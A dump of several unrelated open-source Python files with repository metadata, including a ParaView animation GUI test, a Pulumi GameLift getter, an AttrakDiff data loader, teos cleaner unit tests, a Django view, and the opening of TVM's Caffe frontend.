] | null | null | null |
Applications/ParaView/Testing/Python/SaveAnimationMultiView.py
|
UV-CDAT/ParaView
|
095ac28404a85fd86676491b8952884805842223
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import QtTesting
import QtTestingImage
import time
object1 = 'pqClientMainWindow/menubar/menuSources'
QtTesting.playCommand(object1, 'activate', 'Wavelet')
object2 = 'pqClientMainWindow/objectInspectorDock/objectInspector/Accept'
QtTesting.playCommand(object2, 'activate', '')
object6 = 'pqClientMainWindow/1QTabBar1'
QtTesting.playCommand(object6, 'set_tab_with_text', 'Display')
object24 = 'pqClientMainWindow/displayDock/displayWidgetFrame/displayScrollArea/qt_scrollarea_viewport/displayWidget/pqDisplayProxyEditor/StyleGroup/StyleRepresentation/comboBox'
QtTesting.playCommand(object24, 'set_string', 'Surface')
object25 = 'pqClientMainWindow/displayDock/displayWidgetFrame/displayScrollArea/qt_scrollarea_viewport/displayWidget/pqDisplayProxyEditor/ColorGroup/ColorBy/Variables'
QtTesting.playCommand(object25, 'set_string', 'RTData')
QtTesting.playCommand(object6, 'set_tab_with_text', 'Properties')
object3 = 'pqClientMainWindow/centralwidget/MultiViewWidget/CoreWidget/qt_tabwidget_stackedwidget/MultiViewWidget1/Frame.0/SplitHorizontal'
QtTesting.playCommand(object3, 'activate', '')
QtTesting.playCommand(object1, 'activate', 'Arrow')
QtTesting.playCommand(object2, 'activate', '')
object4 = 'pqClientMainWindow/objectInspectorDock/objectInspector/Delete'
QtTesting.playCommand(object4, 'activate', '')
object4 = 'pqClientMainWindow/centralwidget/MultiViewWidget/CoreWidget/qt_tabwidget_stackedwidget/MultiViewWidget1/Splitter.0/Frame.2/SplitVertical'
QtTesting.playCommand(object4, 'activate', '')
QtTesting.playCommand(object1, 'activate', 'Sphere')
QtTesting.playCommand(object2, 'activate', '')
QtTesting.playCommand(object6, 'set_tab_with_text', 'Display')
object8 = 'pqClientMainWindow/displayDock/displayWidgetFrame/displayScrollArea/qt_scrollarea_viewport/displayWidget/Form/ViewGroup/ViewData'
QtTesting.playCommand(object8, 'set_boolean', 'false')
QtTesting.playCommand(object8, 'set_boolean', 'false')
QtTesting.playCommand(object8, 'set_boolean', 'false')
QtTesting.playCommand(object8, 'set_boolean', 'false')
object9 = 'pqClientMainWindow/menubar/menu_File'
QtTesting.playCommand(object9, 'activate', 'actionFileOpen')
QtTesting.playCommand(object6, 'set_tab_with_text', 'Properties')
object10 = 'pqClientMainWindow/FileOpenDialog'
QtTesting.playCommand(object10, 'filesSelected', '$PARAVIEW_DATA_ROOT/Data/dualSphereAnimation.pvd')
QtTesting.playCommand(object2, 'activate', '')
object11 = 'pqClientMainWindow/menubar/menuView'
QtTesting.playCommand(object11, 'activate', 'Animation View')
object15 = 'pqClientMainWindow/pipelineBrowserDock/pipelineBrowser'
QtTesting.playCommand(object15, 'currentChanged', '/0/1|0')
#object12 = 'pqClientMainWindow/animationPanelDock/1pqAnimationPanel0/scrollArea/qt_scrollarea_viewport/AnimationPanel/tracksGroup/propertyName'
#object14 = 'pqClientMainWindow/animationPanelDock/1pqAnimationPanel0/scrollArea/qt_scrollarea_viewport/AnimationPanel/keyFramePropertiesGroup/addKeyFrame'
#QtTesting.playCommand(object12, 'set_string', 'End Theta')
#QtTesting.playCommand(object14, 'activate', '')
object12 = 'pqClientMainWindow/animationViewDock/animationView/pqAnimationWidget/CreateDeleteWidget/PropertyCombo'
QtTesting.playCommand(object12, 'set_string', 'End Theta')
object10 = "pqClientMainWindow/animationViewDock/animationView/1pqAnimationWidget0/1QHeaderView0"
QtTesting.playCommand(object10, "mousePress", "1,1,0,0,0,2")
QtTesting.playCommand(object10, "mouseRelease", "1,1,0,0,0,2")
QtTesting.playCommand(object15, 'currentChanged', '/0/0|0')
QtTesting.playCommand(object10, "mousePress", "1,1,0,0,0,3")
QtTesting.playCommand(object10, "mouseRelease", "1,1,0,0,0,3")
object17 = 'pqClientMainWindow/VCRToolbar/1QToolButton0'
QtTesting.playCommand(object17, 'activate', '')
object18 = 'pqClientMainWindow/VCRToolbar/1QToolButton3'
#object19 = 'pqClientMainWindow/animationPanelDock/1pqAnimationPanel0/scrollArea/qt_scrollarea_viewport/AnimationPanel/keyFramePropertiesGroup/editorFrame/SignalAdaptorKeyFrameValue/lineEdit'
#QtTesting.playCommand(object19, 'set_string', '10')
#QtTesting.playCommand(object19, 'set_string', '10')
object20 = 'pqClientMainWindow/VCRToolbar/1QToolButton1'
QtTesting.playCommand(object11, 'activate', 'Animation View')
QtTesting.playCommand(object11, 'activate', 'Object Inspector')
QtTesting.playCommand(object11, 'activate', 'Pipeline Browser')
QtTesting.playCommand(object9, 'activate', 'actionFileSaveAnimation')
object21 = 'Dialog/spinBoxWidth'
QtTesting.playCommand(object21, 'set_int', '800')
object22 = 'Dialog/spinBoxHeight'
QtTesting.playCommand(object22, 'set_int', '800')
object22 = 'Dialog/okButton'
QtTesting.playCommand(object22, 'activate', '')
objectSaveAnimationDialog = 'FileSaveAnimationDialog'
QtTesting.playCommand(objectSaveAnimationDialog, 'filesSelected', '$PARAVIEW_TEST_ROOT/movie_test.png')
time.sleep(3);
objectPlayButton = 'pqClientMainWindow/VCRToolbar/1QToolButton2'
while QtTesting.getProperty(objectPlayButton, "text") != 'Play' :
time.sleep(1);
QtTestingImage.compareImage('$PARAVIEW_TEST_ROOT/movie_test.0005.png', 'SaveAnimationMultiView.png');
| 55.576087
| 191
| 0.825543
|
aa6072a558dffdce13798f2b6efb65f1d2f32089
| 6,696
|
py
|
Python
|
sdk/python/pulumi_aws_native/gamelift/get_game_session_queue.py
|
pulumi/pulumi-aws-native
|
1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3
|
[
"Apache-2.0"
] | 29
|
2021-09-30T19:32:07.000Z
|
2022-03-22T21:06:08.000Z
|
sdk/python/pulumi_aws_native/gamelift/get_game_session_queue.py
|
pulumi/pulumi-aws-native
|
1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3
|
[
"Apache-2.0"
] | 232
|
2021-09-30T19:26:26.000Z
|
2022-03-31T23:22:06.000Z
|
sdk/python/pulumi_aws_native/gamelift/get_game_session_queue.py
|
pulumi/pulumi-aws-native
|
1ae4a4d9c2256b2a79ca536f8d8497b28d10e4c3
|
[
"Apache-2.0"
] | 4
|
2021-11-10T19:42:01.000Z
|
2022-02-05T10:15:49.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetGameSessionQueueResult',
'AwaitableGetGameSessionQueueResult',
'get_game_session_queue',
'get_game_session_queue_output',
]
@pulumi.output_type
class GetGameSessionQueueResult:
def __init__(__self__, arn=None, custom_event_data=None, destinations=None, filter_configuration=None, id=None, notification_target=None, player_latency_policies=None, priority_configuration=None, tags=None, timeout_in_seconds=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if custom_event_data and not isinstance(custom_event_data, str):
raise TypeError("Expected argument 'custom_event_data' to be a str")
pulumi.set(__self__, "custom_event_data", custom_event_data)
if destinations and not isinstance(destinations, list):
raise TypeError("Expected argument 'destinations' to be a list")
pulumi.set(__self__, "destinations", destinations)
if filter_configuration and not isinstance(filter_configuration, dict):
raise TypeError("Expected argument 'filter_configuration' to be a dict")
pulumi.set(__self__, "filter_configuration", filter_configuration)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if notification_target and not isinstance(notification_target, str):
raise TypeError("Expected argument 'notification_target' to be a str")
pulumi.set(__self__, "notification_target", notification_target)
if player_latency_policies and not isinstance(player_latency_policies, list):
raise TypeError("Expected argument 'player_latency_policies' to be a list")
pulumi.set(__self__, "player_latency_policies", player_latency_policies)
if priority_configuration and not isinstance(priority_configuration, dict):
raise TypeError("Expected argument 'priority_configuration' to be a dict")
pulumi.set(__self__, "priority_configuration", priority_configuration)
if tags and not isinstance(tags, list):
raise TypeError("Expected argument 'tags' to be a list")
pulumi.set(__self__, "tags", tags)
if timeout_in_seconds and not isinstance(timeout_in_seconds, int):
raise TypeError("Expected argument 'timeout_in_seconds' to be a int")
pulumi.set(__self__, "timeout_in_seconds", timeout_in_seconds)
@property
@pulumi.getter
def arn(self) -> Optional[str]:
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="customEventData")
def custom_event_data(self) -> Optional[str]:
return pulumi.get(self, "custom_event_data")
@property
@pulumi.getter
def destinations(self) -> Optional[Sequence['outputs.GameSessionQueueDestination']]:
return pulumi.get(self, "destinations")
@property
@pulumi.getter(name="filterConfiguration")
def filter_configuration(self) -> Optional['outputs.GameSessionQueueFilterConfiguration']:
return pulumi.get(self, "filter_configuration")
@property
@pulumi.getter
def id(self) -> Optional[str]:
return pulumi.get(self, "id")
@property
@pulumi.getter(name="notificationTarget")
def notification_target(self) -> Optional[str]:
return pulumi.get(self, "notification_target")
@property
@pulumi.getter(name="playerLatencyPolicies")
def player_latency_policies(self) -> Optional[Sequence['outputs.GameSessionQueuePlayerLatencyPolicy']]:
return pulumi.get(self, "player_latency_policies")
@property
@pulumi.getter(name="priorityConfiguration")
def priority_configuration(self) -> Optional['outputs.GameSessionQueuePriorityConfiguration']:
return pulumi.get(self, "priority_configuration")
@property
@pulumi.getter
def tags(self) -> Optional[Sequence['outputs.GameSessionQueueTag']]:
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="timeoutInSeconds")
def timeout_in_seconds(self) -> Optional[int]:
return pulumi.get(self, "timeout_in_seconds")
class AwaitableGetGameSessionQueueResult(GetGameSessionQueueResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetGameSessionQueueResult(
arn=self.arn,
custom_event_data=self.custom_event_data,
destinations=self.destinations,
filter_configuration=self.filter_configuration,
id=self.id,
notification_target=self.notification_target,
player_latency_policies=self.player_latency_policies,
priority_configuration=self.priority_configuration,
tags=self.tags,
timeout_in_seconds=self.timeout_in_seconds)
def get_game_session_queue(id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetGameSessionQueueResult:
"""
Resource Type definition for AWS::GameLift::GameSessionQueue
"""
__args__ = dict()
__args__['id'] = id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws-native:gamelift:getGameSessionQueue', __args__, opts=opts, typ=GetGameSessionQueueResult).value
return AwaitableGetGameSessionQueueResult(
arn=__ret__.arn,
custom_event_data=__ret__.custom_event_data,
destinations=__ret__.destinations,
filter_configuration=__ret__.filter_configuration,
id=__ret__.id,
notification_target=__ret__.notification_target,
player_latency_policies=__ret__.player_latency_policies,
priority_configuration=__ret__.priority_configuration,
tags=__ret__.tags,
timeout_in_seconds=__ret__.timeout_in_seconds)
@_utilities.lift_output_func(get_game_session_queue)
def get_game_session_queue_output(id: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetGameSessionQueueResult]:
"""
Resource Type definition for AWS::GameLift::GameSessionQueue
"""
...
| 43.2
| 237
| 0.709229
|
36ea5a21bfb971f781171b1784bf435d8009291d
| 5,147
|
py
|
Python
|
pladif/data.py
|
thilaire/PLADIF
|
2eab080e60505f6efe8050b7144498a504d441a4
|
[
"MIT"
] | null | null | null |
pladif/data.py
|
thilaire/PLADIF
|
2eab080e60505f6efe8050b7144498a504d441a4
|
[
"MIT"
] | null | null | null |
pladif/data.py
|
thilaire/PLADIF
|
2eab080e60505f6efe8050b7144498a504d441a4
|
[
"MIT"
] | null | null | null |
""""This file is part of PLADIF.
MIT License
Copyright (c) 2022 - Thibault Hilaire
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
PLADIF is a simple tool that plots attrakdiff graphs from CSV files (like those from Usabilla).
It is written by Thibault Hilaire
File: data.py
Date: March 2022
class for the data
"""
from __future__ import annotations
from io import BytesIO
from os.path import splitext
from pandas import read_csv, read_excel
from math import log10
from pladif.naming import order_long, order_short, pairs
def datasize(size, lang):
"""
	Format a size in bytes into a human-readable string such as "1.234 kB",
	using the unit names of the given language; returns "unknown" for a falsy size.
"""
# see https://stackoverflow.com/questions/12523586/python-format-size-application-converting-b-to-kb-mb-gb-tb
units = {'en': ["B", "kB", "MB", "GB", "TB"], 'fr': ["o", "ko", "Mo", "Go", "To"], 'de': ["B", "kB", "MB", "GB", "TB"]}
if size:
scaling = round(log10(size))//3
		scaling = min(len(units[lang]) - 1, scaling)  # cap the index at the largest available unit
return "%.3f %s" % (size/(10**(3*scaling)), units[lang][scaling])
else:
return "unknown"
def removeStar(st: str) -> str:
"""remove the '*' character in the end of the categories"""
return st[:-1] if '*' in st else st
class DataAttrakdiff:
"""encapsulates the data
- _filename: (str) file name
- _CSVcolumns: list of initial column names (in the CSV file)
- _df: (DataFrame) data
"""
def __init__(self, file: BytesIO | str):
"""Load the data from an (already open) csv file
The data is normalize in [-3,3]
"""
		# open the file if it's just a filename
if isinstance(file, str):
file = open(file, "rb")
self._filename = file.name
_, ext = splitext(self._filename)
# read the excel file into a dataframe
if ext[1:] == 'csv':
self._df = read_csv(file, index_col=0, encoding="UTF-16", delimiter='\t') # encoding=None, encoding_errors="replace"
# drop all the columns after the URL column
try:
url_index = self._df.columns.get_loc("URL")
except KeyError:
raise ValueError("The csv file is not a valid Usabilla one (does not contain a 'URL' column) !")
self._CSVcolumns = self._df.columns[:url_index]
self._df.drop(columns=self._df.columns[url_index:], inplace=True)
# check the size and rename the columns
if len(self._df.columns) not in [len(order_short), len(order_long)]:
raise ValueError("The csv file is not a valid Usabilla one (doesn not have %d or %d useful columns)" % (
len(order_short), len(order_long)))
self._df.columns = order_short if len(self._df.columns) == len(order_short) else order_long
elif ext[1:] in ['xls', 'xlsx', 'xlsm', 'xlsb', 'odf', 'ods', 'odt']:
self._df = read_excel(file, sheet_name=0, index_col=0) # encoding=None, encoding_errors="replace"
self._CSVcolumns = self._df.columns
# check if the columns are valid
if set(self._df.columns) != set(order_short) and set(self._df.columns) != set(order_long):
raise ValueError("The excel file doesn't have proper columns (not in %s)" % str(order_long))
# normalize data in [-3,3]
for col, serie in self._df.items():
if '*' in col:
self._df[col] = 4 - self._df[col] # reverse from 3 to -3
else:
self._df[col] = self._df[col] - 4 # from -3 to 3
		# remove the '*' and sort the columns (same order as in the ordered dictionary `pairs`)
self._df.columns = map(removeStar, self._df.columns)
d = {k: v for v, k in enumerate(pairs)}
col, self._CSVcolumns = zip(*sorted(zip(self._df.columns, self._CSVcolumns), key=lambda x: d.get(x[0])))
self._df = self._df.reindex(columns=col)
# get filesize
try:
self._size = file.getbuffer().nbytes
except AttributeError:
self._size = 0
def summary(self, col, lang):
"""return a summary of the data
containing the filename, the number of users and """
col = list(c if '*' not in c else c[:-1] for c in col)
d = {col: csv for col, csv in zip(self._df.columns, self._CSVcolumns)}
return [self._filename, str(self._df.shape[0]), datasize(self._size, lang)] + [d.get(c, '') for c in col]
@property
def columns(self):
"""returns the columns"""
return self._df.columns
@property
def df(self):
"""return the dataframe"""
return self._df
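# A hedged usage sketch (not part of the original module): "survey.xlsx" is a placeholder
# file name and must follow the Usabilla/AttrakDiff column layout expected above. The
# __main__ guard keeps importing this module side-effect free, and the isfile check makes
# the sketch a no-op when the placeholder file is absent.
if __name__ == "__main__":
	from os.path import isfile
	if isfile("survey.xlsx"):
		_data = DataAttrakdiff("survey.xlsx")
		print(_data.summary(_data.columns, "en"))
		print(_data.df.mean())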
| 38.125926
| 120
| 0.700019
|
216c9b924bda70647af17c7ce898507268ebff83
| 205
|
py
|
Python
|
blog/users/views.py
|
zn79213/blog
|
b396b4319afc066da1eb5eca40179a9b0ca9fa74
|
[
"MIT"
] | null | null | null |
blog/users/views.py
|
zn79213/blog
|
b396b4319afc066da1eb5eca40179a9b0ca9fa74
|
[
"MIT"
] | null | null | null |
blog/users/views.py
|
zn79213/blog
|
b396b4319afc066da1eb5eca40179a9b0ca9fa74
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
# Create your views here.
# Registration view
from django.views import View
class RegisterView(View):
def get(self, request):
return render(request, "register.html")
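# A hedged illustration (not part of the original file): wiring the view above into a
# URLconf. In a real project this would normally live in the app's urls.py rather than
# views.py; it is included here only as a sketch of the intended usage.
from django.urls import path
urlpatterns = [
    path("register/", RegisterView.as_view(), name="register"),
]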
| 17.083333
| 47
| 0.721951
|
e956440c7eea33a98f0dbbd7ea5381779ffef44f
| 11,420
|
py
|
Python
|
test/teos/unit/test_cleaner.py
|
orbitalturtle/python-teos
|
bcdde7675ebdaa4e63482b0c6ea3c80a89e8e67e
|
[
"MIT"
] | null | null | null |
test/teos/unit/test_cleaner.py
|
orbitalturtle/python-teos
|
bcdde7675ebdaa4e63482b0c6ea3c80a89e8e67e
|
[
"MIT"
] | null | null | null |
test/teos/unit/test_cleaner.py
|
orbitalturtle/python-teos
|
bcdde7675ebdaa4e63482b0c6ea3c80a89e8e67e
|
[
"MIT"
] | null | null | null |
import random
from uuid import uuid4
from teos.cleaner import Cleaner
from teos.gatekeeper import UserInfo
from teos.responder import TransactionTracker
from common.appointment import Appointment
from test.teos.unit.conftest import get_random_value_hex
from common.constants import LOCATOR_LEN_BYTES, LOCATOR_LEN_HEX
CONFIRMATIONS = 6
ITEMS = 10
MAX_ITEMS = 100
ITERATIONS = 10
# FIXME: 194 this is using the dummiest appointment, can be updated with the fixture once it's implemented
def set_up_appointments(db_manager, total_appointments):
appointments = dict()
locator_uuid_map = dict()
for i in range(total_appointments):
uuid = uuid4().hex
locator = get_random_value_hex(LOCATOR_LEN_BYTES)
appointment = Appointment(locator, None, None)
appointments[uuid] = {"locator": appointment.locator}
locator_uuid_map[locator] = [uuid]
db_manager.store_watcher_appointment(uuid, appointment.to_dict())
db_manager.create_append_locator_map(locator, uuid)
# Each locator can have more than one uuid assigned to it.
if i % 2:
uuid = uuid4().hex
appointments[uuid] = {"locator": appointment.locator}
locator_uuid_map[locator].append(uuid)
db_manager.store_watcher_appointment(uuid, appointment.to_dict())
db_manager.create_append_locator_map(locator, uuid)
return appointments, locator_uuid_map
# FIXME: 194 this is using the dummiest tracker, can be updated with the fixture once it's implemented
def set_up_trackers(db_manager, total_trackers):
trackers = dict()
tx_tracker_map = dict()
for i in range(total_trackers):
uuid = uuid4().hex
        # penalty_txid and dispute_txid are just independent random values here, it shouldn't matter
penalty_txid = get_random_value_hex(32)
dispute_txid = get_random_value_hex(32)
locator = dispute_txid[:LOCATOR_LEN_HEX]
# Assign both penalty_txid and dispute_txid the same id (it shouldn't matter)
tracker = TransactionTracker(locator, dispute_txid, penalty_txid, None, None)
trackers[uuid] = {"locator": tracker.locator, "penalty_txid": tracker.penalty_txid}
tx_tracker_map[penalty_txid] = [uuid]
db_manager.store_responder_tracker(uuid, tracker.to_dict())
db_manager.create_append_locator_map(tracker.locator, uuid)
# Each penalty_txid can have more than one uuid assigned to it.
if i % 2:
uuid = uuid4().hex
trackers[uuid] = {"locator": tracker.locator, "penalty_txid": tracker.penalty_txid}
tx_tracker_map[penalty_txid].append(uuid)
db_manager.store_responder_tracker(uuid, tracker.to_dict())
db_manager.create_append_locator_map(tracker.locator, uuid)
return trackers, tx_tracker_map
def test_delete_appointment_from_memory(db_manager):
appointments, locator_uuid_map = set_up_appointments(db_manager, MAX_ITEMS)
for uuid in list(appointments.keys()):
Cleaner.delete_appointment_from_memory(uuid, appointments, locator_uuid_map)
# The appointment should have been deleted from memory, but not from the db
assert uuid not in appointments
assert db_manager.load_watcher_appointment(uuid) is not None
def test_delete_appointment_from_db(db_manager):
appointments, locator_uuid_map = set_up_appointments(db_manager, MAX_ITEMS)
for uuid in list(appointments.keys()):
Cleaner.delete_appointment_from_db(uuid, db_manager)
        # The appointment should have been deleted from the db, but not from memory
assert uuid in appointments
assert db_manager.load_watcher_appointment(uuid) is None
def test_update_delete_db_locator_map(db_manager):
appointments, locator_uuid_map = set_up_appointments(db_manager, MAX_ITEMS)
for uuid, appointment in appointments.items():
locator = appointment.get("locator")
locator_map_before = db_manager.load_locator_map(locator)
Cleaner.update_delete_db_locator_map([uuid], locator, db_manager)
locator_map_after = db_manager.load_locator_map(locator)
if locator_map_after is None:
assert locator_map_before is not None
else:
assert uuid in locator_map_before and uuid not in locator_map_after
def test_delete_outdated_appointments(db_manager):
for _ in range(ITERATIONS):
appointments, locator_uuid_map = set_up_appointments(db_manager, MAX_ITEMS)
outdated_appointments = random.sample(list(appointments.keys()), k=ITEMS)
Cleaner.delete_outdated_appointments(outdated_appointments, appointments, locator_uuid_map, db_manager)
assert not set(outdated_appointments).issubset(appointments.keys())
def test_delete_completed_appointments(db_manager):
for _ in range(ITERATIONS):
appointments, locator_uuid_map = set_up_appointments(db_manager, MAX_ITEMS)
completed_appointments = random.sample(list(appointments.keys()), k=ITEMS)
len_before_clean = len(appointments)
Cleaner.delete_completed_appointments(completed_appointments, appointments, locator_uuid_map, db_manager)
# ITEMS appointments should have been deleted from memory
assert len(appointments) == len_before_clean - ITEMS
# Make sure they are not in the db either
db_appointments = db_manager.load_watcher_appointments(include_triggered=True)
assert not set(completed_appointments).issubset(db_appointments)
def test_flag_triggered_appointments(db_manager):
for _ in range(ITERATIONS):
appointments, locator_uuid_map = set_up_appointments(db_manager, MAX_ITEMS)
triggered_appointments = random.sample(list(appointments.keys()), k=ITEMS)
len_before_clean = len(appointments)
Cleaner.flag_triggered_appointments(triggered_appointments, appointments, locator_uuid_map, db_manager)
# ITEMS appointments should have been deleted from memory
assert len(appointments) == len_before_clean - ITEMS
# Make sure that all appointments are flagged as triggered in the db
db_appointments = db_manager.load_all_triggered_flags()
assert set(triggered_appointments).issubset(db_appointments)
def test_delete_trackers_db_match(db_manager):
# Completed and outdated trackers are deleted using the same method. The only difference is the logging message
height = 0
for _ in range(ITERATIONS):
trackers, tx_tracker_map = set_up_trackers(db_manager, MAX_ITEMS)
selected_trackers = random.sample(list(trackers.keys()), k=ITEMS)
completed_trackers = {tracker: 6 for tracker in selected_trackers}
Cleaner.delete_trackers(completed_trackers, height, trackers, tx_tracker_map, db_manager)
assert not set(completed_trackers).issubset(trackers.keys())
def test_delete_trackers_no_db_match(db_manager):
height = 0
for _ in range(ITERATIONS):
trackers, tx_tracker_map = set_up_trackers(db_manager, MAX_ITEMS)
selected_trackers = random.sample(list(trackers.keys()), k=ITEMS)
        # Let's change some uuids by creating new trackers that are not included in the db and share a penalty_txid
# with another tracker that is stored in the db.
for uuid in selected_trackers[: ITEMS // 2]:
penalty_txid = trackers[uuid].get("penalty_txid")
dispute_txid = get_random_value_hex(32)
locator = dispute_txid[:LOCATOR_LEN_HEX]
new_uuid = uuid4().hex
trackers[new_uuid] = {"locator": locator, "penalty_txid": penalty_txid}
tx_tracker_map[penalty_txid].append(new_uuid)
selected_trackers.append(new_uuid)
# Let's add some random data
for i in range(ITEMS // 2):
uuid = uuid4().hex
penalty_txid = get_random_value_hex(32)
dispute_txid = get_random_value_hex(32)
locator = dispute_txid[:LOCATOR_LEN_HEX]
trackers[uuid] = {"locator": locator, "penalty_txid": penalty_txid}
tx_tracker_map[penalty_txid] = [uuid]
selected_trackers.append(uuid)
completed_trackers = {tracker: 6 for tracker in selected_trackers}
# We should be able to delete the correct ones and not fail in the others
Cleaner.delete_trackers(completed_trackers, height, trackers, tx_tracker_map, db_manager)
assert not set(completed_trackers).issubset(trackers.keys())
# FIXME: 194 will do with dummy gatekeeper since this is only deleting data from the structures
def test_delete_gatekeeper_appointments(gatekeeper):
    # delete_gatekeeper_appointments should delete the appointments from the user as long as both exist
appointments_not_to_delete = {}
appointments_to_delete = {}
# Let's add some users and appointments to the Gatekeeper
for _ in range(10):
user_id = get_random_value_hex(16)
# The UserInfo params do not matter much here
gatekeeper.registered_users[user_id] = UserInfo(available_slots=100, subscription_expiry=0)
for _ in range(random.randint(0, 10)):
# Add some appointments
uuid = get_random_value_hex(16)
gatekeeper.registered_users[user_id].appointments[uuid] = 1
if random.randint(0, 1) % 2:
appointments_to_delete[uuid] = user_id
else:
appointments_not_to_delete[uuid] = user_id
# Now let's delete half of them
Cleaner.delete_gatekeeper_appointments(appointments_to_delete, gatekeeper.registered_users, gatekeeper.user_db)
all_appointments_gatekeeper = []
# Let's get all the appointments in the Gatekeeper
for user_id, user in gatekeeper.registered_users.items():
all_appointments_gatekeeper.extend(user.appointments)
# Check that the first half of the appointments are not in the Gatekeeper, but the second half is
assert not set(appointments_to_delete).issubset(all_appointments_gatekeeper)
assert set(appointments_not_to_delete).issubset(all_appointments_gatekeeper)
def test_delete_outdated_users(gatekeeper):
    # This tests the deletion of users whose subscription is outdated (subscription expires now)
# Create some users with associated data and add them to the gatekeeper
users = {}
current_height = gatekeeper.block_processor.get_block_count()
for _ in range(10):
appointments = {get_random_value_hex(32): Appointment(get_random_value_hex(32), None, None)}
user_id = get_random_value_hex(16)
user_info = UserInfo(available_slots=100, subscription_expiry=current_height, appointments=appointments)
users[user_id] = user_info
gatekeeper.registered_users[user_id] = user_info
# Get a list of the users that should be deleted at this block height (must match the newly generated ones)
users_to_be_deleted = gatekeeper.get_outdated_user_ids(current_height + gatekeeper.expiry_delta)
assert users_to_be_deleted == list(users.keys())
# Delete the users
Cleaner.delete_outdated_users(users_to_be_deleted, gatekeeper.registered_users, gatekeeper.user_db)
# Check that the users are not in the gatekeeper anymore
for user_id in users_to_be_deleted:
assert user_id not in gatekeeper.registered_users
assert not gatekeeper.user_db.load_user(user_id)
| 41.831502
| 116
| 0.728722
|
dd3abcf3cfa28a96b4d47c65a629eee7383c96af
| 115
|
py
|
Python
|
kaishisong-20210605/test_case/dev_case/quotation/__init__.py
|
ti132520/kaishisong-python-test
|
22eccd989ebb9e7401838d2b3cb82cd211d7660e
|
[
"Apache-2.0"
] | null | null | null |
kaishisong-20210605/test_case/dev_case/quotation/__init__.py
|
ti132520/kaishisong-python-test
|
22eccd989ebb9e7401838d2b3cb82cd211d7660e
|
[
"Apache-2.0"
] | null | null | null |
kaishisong-20210605/test_case/dev_case/quotation/__init__.py
|
ti132520/kaishisong-python-test
|
22eccd989ebb9e7401838d2b3cb82cd211d7660e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Author : 怕你呀
# Time : 2021/6/5
# File : __init__.py
# IDE : PyCharm
| 19.166667
| 25
| 0.46087
|
2d9f44e284f49a162defe5e604e36e89d7c0080f
| 38,008
|
py
|
Python
|
python/tvm/relay/frontend/caffe.py
|
shengxinhu/tvm
|
06c443e9959452c6da3a911fe0c11e08c5554477
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 4,640
|
2017-08-17T19:22:15.000Z
|
2019-11-04T15:29:46.000Z
|
python/tvm/relay/frontend/caffe.py
|
shengxinhu/tvm
|
06c443e9959452c6da3a911fe0c11e08c5554477
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 2,863
|
2017-08-17T19:55:50.000Z
|
2019-11-04T17:18:41.000Z
|
python/tvm/relay/frontend/caffe.py
|
shengxinhu/tvm
|
06c443e9959452c6da3a911fe0c11e08c5554477
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1,352
|
2017-08-17T19:30:38.000Z
|
2019-11-04T16:09:29.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument, too-many-lines, import-outside-toplevel
# pylint: disable=no-else-return, no-else-continue
"""Caffe frontend."""
import numpy as np
import tvm
from tvm.ir import IRModule
from ... import nd as _nd
from .. import analysis
from .. import expr as _expr
from .. import function as _function
from .. import op as _op
from .common import ExprTable
from .common import infer_shape as _infer_shape
__all__ = ["from_caffe"]
class OperatorConverter(object):
"""Operator Converted for converting Caffe ops to Relay ops"""
def __init__(self, init_layer_dict, predict_layer, exp_tab):
self.init_layer_dict = init_layer_dict
self.predict_layer = predict_layer
self.exp_tab = exp_tab
self.new_bn = {}
